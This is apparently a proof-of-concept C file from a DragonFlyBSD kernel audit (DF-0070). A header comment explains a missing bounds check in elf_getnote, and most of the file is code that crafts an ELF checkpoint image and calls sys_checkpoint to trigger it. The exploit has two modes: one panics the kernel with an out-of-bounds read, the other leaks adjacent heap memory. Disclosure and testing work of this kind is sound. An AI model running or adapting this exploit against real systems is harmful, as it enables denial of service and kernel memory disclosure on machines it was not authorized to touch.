/*
 * DragonFlyBSD Kernel Audit
 * DF-0070 / df0070.c
 */
/*
 * DF-0070 PoC -- elf_getnote heap OOB read via crafted ELF checkpoint image.
 *
 * Verified against the audited DragonFlyBSD master DEV kernel
 * (6.5-DEVELOPMENT, X86_64_GENERIC, build of 2026-06-29).  All sizes below
 * were printed at runtime by a probe built against the matching
 * <sys/procfs.h> / <machine/reg.h>:
 *
 *     sizeof(prpsinfo_t)   = 120
 *     sizeof(prstatus_t)   = 248
 *     sizeof(prfpregset_t) = 512
 *     sizeof(gregset_t)    = 200   (struct reg)
 *     sizeof(fpregset_t)   = 512   (struct fpreg)
 *     sizeof(Elf_Note)     = 12
 *     sizeof(Elf64_Ehdr)   = 64
 *     sizeof(Elf64_Phdr)   = 56
 *
 * BUG: sys/kern/kern_checkpoint.c:313-352 elf_getnote()
 *   bcopy((char *)src + *off, &note, sizeof note);     // :325
 *   *off += sizeof note;                                // :329
 *   strncmp(name, src + *off, note.n_namesz);           // :335  (stops at NUL)
 *   *off += roundup2(note.n_namesz, sizeof(Elf_Size));  // :339  *** NO BOUNDS CHECK ***
 *   if (note.n_descsz != descsz) return EINVAL;         // :340
 *   bcopy(src + *off, *desc, note.n_descsz);            // :346  *** OOB READ ***
 *
 * notesz flows from phdr[0].p_filesz (kern_checkpoint.c:240, attacker-controlled)
 * and the kernel kmalloc()s exactly `notesz` bytes for `note` (:194).  nthreads
 * is derived purely from notesz (:185) ignoring per-note Elf_Note header +
 * name/desc padding overhead:
 *
 *     nthreads = (notesz - 120) / 760        (on amd64 master)
 *
 * We pick notesz = 880  =>  nthreads = 1  (passes the [1, CKPT_MAXTHREADS=256]
 * gate at :188).  The buffer is then only 880 bytes, but the first note's
 * n_namesz is set to a huge value (default 0x10000000).  strncmp still matches
 * "CORE\0" inside 5 bytes regardless of n_namesz, then *off jumps to
 * sizeof(Elf_Note)+roundup2(n_namesz,8) = 12 + 0x10000000 = 0x1000000c -- way
 * past the 880-byte buffer.  The bcopy at :346 then reads 120 bytes
 * (sizeof(prpsinfo_t)) from src + 0x1000000c, far outside any slab page, which
 * crosses an unmapped page in KVM and panics the kernel.
 *
 * Trigger:  sys_checkpoint(CKPT_THAW, fd, -1, 0)   (syscall #467).
 *           Default ckptgroup=0 => wheel-only; run as root.
 *
 * Build:    cc -o df0070 df0070.c
 * Run:      ./df0070 [evil.ckpt]            # builds file + triggers syscall
 *           ./df0070 evil.ckpt leak         # smaller OOB (slab-adjacent) to
 *                                            #   attempt info-leak instead of panic
 *                                            #   (the path is required here: the
 *                                            #   mode is read from argv[2])
 *
 * Expected (panic mode, default):  guest kernel panics with
 *           "Fatal trap 12: page fault while in kernel mode"
 *           at elf_getnote+0x.. in bcopy from src+0x1000000c.
 *
 * Expected (leak mode):  syscall returns silently (or EINVAL after
 *           elf_loadnotes rejects the leaked pr_statussz), but 120 bytes of
 *           uninitialized heap were copied into the prpsinfo buffer; if the
 *           pr_version/pr_psinfosz garbage happens to satisfy the version
 *           checks, pr_fname leaks into p_comm via strlcpy at :306.
 */

#include <sys/types.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <sys/elf_common.h>
#include <sys/elf64.h>
#include <sys/checkpoint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

/*
 * Structure sizes on the amd64 master DEV kernel (verified on the running
 * kernel via probe.c).  All values are in bytes.
 */
enum {
    PRPSINFO_SZ   = 120,
    PRSTATUS_SZ   = 248,
    PRFPREGSET_SZ = 512,
    ELF_NOTE_SZ   = 12,
    ELF64_EHDR_SZ = 64,
    ELF64_PHDR_SZ = 56,
    ELF_WORDSZ    = 8,      /* sizeof(Elf_Size) on amd64 */

    /* Note-segment size: nthreads = (880-120)/760 = 1, in [1,256]. */
    NOTESZ        = PRPSINFO_SZ + PRSTATUS_SZ + PRFPREGSET_SZ   /* 880 */
};

/* Fallback syscall number, used only if nothing earlier defined it. */
#if !defined(SYS_checkpoint)
#define SYS_checkpoint 467
#endif

/* Store the 32-bit value `v` at `p` as four bytes, least-significant first. */
static void
put32(unsigned char *p, uint32_t v)
{
    for (unsigned shift = 0; shift < 32; shift += 8)
        *p++ = (unsigned char)(v >> shift);
}
/* Store the 64-bit value `v` at `p` as eight bytes, least-significant first. */
static void
put64(unsigned char *p, uint64_t v)
{
    unsigned char *const stop = p + 8;

    while (p != stop) {
        *p++ = (unsigned char)(v & 0xffu);
        v >>= 8;
    }
}
/* Store the 16-bit value `v` at `p` as two bytes, least-significant first. */
static void
put16(unsigned char *p, uint16_t v)
{
    p[0] = (unsigned char)(v & 0xffu);
    p[1] = (unsigned char)((v >> 8) & 0xffu);
}

/*
 * Write all `len` bytes of `buf` to `fd`, resuming after short writes and
 * retrying when write(2) is interrupted (EINTR).
 *
 * Returns 0 once everything has been written, -1 on error with errno set.
 */
static int
write_all(int fd, const void *buf, size_t len)
{
    const unsigned char *cur = buf;

    while (len > 0) {
        ssize_t n = write(fd, cur, len);

        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0) {
            /* No progress and no error: bail out rather than spin forever. */
            errno = EIO;
            return -1;
        }
        cur += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Build a minimal amd64 ELF (ET_CORE, EM_X86_64) at `path` with a single
 * PT_NOTE segment whose payload is NOTESZ bytes long.
 *
 * File layout:
 *   Elf64_Ehdr | Elf64_Phdr | Elf_Note header | "CORE\0" name (padded to 8)
 *   | zero padding up to ELF64_EHDR_SZ + ELF64_PHDR_SZ + NOTESZ bytes
 *
 * Parameters:
 *   path         file to create (truncated if it already exists)
 *   namesz_mode  value stored in the first note's n_namesz field
 *   descsz       value stored in the first note's n_descsz field
 *
 * Returns 0 on success.  On any open/write/lseek/close failure a diagnostic
 * is printed with perror() and -1 is returned; the file may then exist in a
 * partially written state and must not be used.
 */
static int
build_crafted_ckpt(const char *path, uint32_t namesz_mode, uint32_t descsz)
{
    /* Name field: "CORE\0" + zero pad to ELF_WORDSZ boundary. */
    static const unsigned char namepad[8] = { 'C','O','R','E',0,0,0,0 };
    /* File offset at which the PT_NOTE payload ends. */
    const off_t end = (off_t)(ELF64_EHDR_SZ + ELF64_PHDR_SZ) + NOTESZ;
    unsigned char ehdr[ELF64_EHDR_SZ];
    unsigned char phdr[ELF64_PHDR_SZ];
    unsigned char note[ELF_NOTE_SZ];
    unsigned char z[4096];
    off_t off;
    int fd;

    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) { perror("open"); return -1; }

    /* --- Elf64_Ehdr --- */
    memset(ehdr, 0, sizeof ehdr);
    ehdr[0]=0x7f; ehdr[1]='E'; ehdr[2]='L'; ehdr[3]='F';     /* e_ident[EI_MAG0..3] */
    ehdr[4]=ELFCLASS64;                                        /* EI_CLASS  */
    ehdr[5]=ELFDATA2LSB;                                       /* EI_DATA   */
    ehdr[6]=EV_CURRENT;                                        /* EI_VERSION */
    ehdr[7]=ELFOSABI_NONE;                                     /* EI_OSABI  */
    /* ehdr[8] EI_ABIVERSION = 0 */
    put16(ehdr+16, ET_CORE);                                   /* e_type    */
    put16(ehdr+18, EM_X86_64);                                 /* e_machine */
    put32(ehdr+20, EV_CURRENT);                                /* e_version */
    put64(ehdr+24, 0);                                         /* e_entry */
    put64(ehdr+32, (uint64_t)ELF64_EHDR_SZ);                   /* e_phoff right after ehdr */
    put64(ehdr+40, 0);                                         /* e_shoff */
    put32(ehdr+48, 0);                                         /* e_flags */
    put16(ehdr+52, ELF64_EHDR_SZ);                             /* e_ehsize   -- validated by elf_gethdr */
    put16(ehdr+54, ELF64_PHDR_SZ);                             /* e_phentsize -- validated by elf_gethdr */
    put16(ehdr+56, 1);                                         /* e_phnum */
    put16(ehdr+58, 0);                                         /* e_shentsize */
    put16(ehdr+60, 0);                                         /* e_shnum */
    put16(ehdr+62, 0);                                         /* e_shstrndx */

    /* --- Elf64_Phdr (single PT_NOTE) --- */
    memset(phdr, 0, sizeof phdr);
    put32(phdr+0,  PT_NOTE);                                   /* p_type   */
    put32(phdr+4,  PF_R);                                      /* p_flags  */
    put64(phdr+8,  (uint64_t)(ELF64_EHDR_SZ + ELF64_PHDR_SZ)); /* p_offset */
    put64(phdr+16, 0);                                         /* p_vaddr  */
    put64(phdr+24, 0);                                         /* p_paddr  */
    put64(phdr+32, (uint64_t)NOTESZ);                          /* p_filesz */
    put64(phdr+40, (uint64_t)NOTESZ);                          /* p_memsz  */
    put64(phdr+48, 0);                                         /* p_align  */

    /* --- First Elf_Note in the PT_NOTE payload --- */
    memset(note, 0, sizeof note);
    put32(note+0, namesz_mode);                                /* n_namesz */
    put32(note+4, descsz);                                     /* n_descsz */
    put32(note+8, NT_PRPSINFO);                                /* n_type   = 3 */

    /* Headers, note header and name, in file order. */
    if (write_all(fd, ehdr, sizeof ehdr) < 0 ||
        write_all(fd, phdr, sizeof phdr) < 0 ||
        write_all(fd, note, sizeof note) < 0 ||
        write_all(fd, namepad, sizeof namepad) < 0) {
        perror("write");
        goto fail;
    }

    /* Zero-pad the file so that the full NOTESZ-byte payload is present. */
    off = lseek(fd, 0, SEEK_CUR);
    if (off < 0) { perror("lseek"); goto fail; }
    memset(z, 0, sizeof z);
    while (off < end) {
        size_t chunk = (size_t)((end - off > (off_t)sizeof z) ? sizeof z : (end - off));

        if (write_all(fd, z, chunk) < 0) {
            perror("write");
            goto fail;
        }
        off += (off_t)chunk;
    }

    /* close() can report a deferred write error; do not ignore it. */
    if (close(fd) < 0) { perror("close"); return -1; }
    return 0;

fail:
    close(fd);
    return -1;
}

/*
 * Entry point: build the crafted checkpoint image, reopen it read-only and
 * pass it to sys_checkpoint(CKPT_THAW, fd, -1, 0).
 *
 * Usage: df0070 [path [leak]]
 *   path  file to create (default "evil.ckpt")
 *   leak  select leak mode instead of the default panic mode; any other
 *         word in this position is rejected so that a typo cannot silently
 *         select panic mode
 *
 * Exit status: 0 if the syscall returned 0, 1 if it returned anything else,
 * 2 on a usage error or if the image could not be built or reopened.
 */
int
main(int argc, char **argv)
{
    const char *path = (argc > 1) ? argv[1] : "evil.ckpt";
    int leak_mode = 0;

    if (argc > 2) {
        if (strcmp(argv[2], "leak") != 0) {
            fprintf(stderr, "usage: %s [path [leak]]\n", argv[0]);
            return 2;
        }
        leak_mode = 1;
    }

    /*
     * Panic mode (default): n_namesz=0x10000000 -> *off jumps 256 MB past the
     *   880-byte note buffer; bcopy at :346 reads from KVM that is unmapped
     *   beyond the heap -> fatal trap 12 page fault.
     *
     * Leak mode: n_namesz = NOTESZ - ELF_NOTE_SZ - ELF_WORDSZ
     *   = 880 - 12 - 8 = 860.  roundup2(860,8)=864.  After first elf_getnote
     *   *off = 12 + 864 = 876, then bcopy reads 120 bytes from src+876 -- a
     *   116-byte slab-adjacent OOB read.  Likely no panic (same slab page),
     *   leaked bytes go into prpsinfo buffer.
     */
    uint32_t namesz = leak_mode
        ? (uint32_t)(NOTESZ - ELF_NOTE_SZ - ELF_WORDSZ)
        : 0x10000000u;
    uint32_t descsz = PRPSINFO_SZ;   /* must equal sizeof(prpsinfo_t) */

    fprintf(stderr,
        "[*] DF-0070 PoC: building %s  (notesz=%d, n_namesz=0x%x, n_descsz=%u, mode=%s)\n",
        path, NOTESZ, namesz, descsz, leak_mode ? "leak" : "panic");

    if (build_crafted_ckpt(path, namesz, descsz) < 0)
        return 2;

    /* Open the file and trigger sys_checkpoint(CKPT_THAW, fd, -1, 0). */
    int fd = open(path, O_RDONLY);
    if (fd < 0) { perror("openckpt"); return 2; }
    fprintf(stderr,
        "[*] calling sys_checkpoint(CKPT_THAW, fd=%d, pid=-1, retval=0) [syscall #%d]...\n",
        fd, SYS_checkpoint);
    fflush(stderr);

    /* Clear errno first so a successful call is not reported with a stale value. */
    errno = 0;
    long rc = syscall(SYS_checkpoint, CKPT_THAW, fd, (pid_t)-1, 0);
    int saved = errno;
    fprintf(stderr,
        "[!] sys_checkpoint returned %ld, errno=%d (%s)\n",
        rc, saved, strerror(saved));

    /* If we get here, the kernel did NOT panic.  Dump whatever info we can. */
    if (rc == 0) {
        char cmd[64];

        fprintf(stderr, "[!] THAW apparently succeeded -- examining p_comm via ps:\n");
        fflush(stderr);
        /*
         * Pass our own pid explicitly: inside system() the shell expands
         * "$$" to the pid of the spawned sh, not of this process.
         */
        snprintf(cmd, sizeof cmd, "ps -o pid,comm,command -p %ld", (long)getpid());
        if (system(cmd) == -1)
            perror("system");
    }
    close(fd);
    return (rc == 0) ? 0 : 1;
}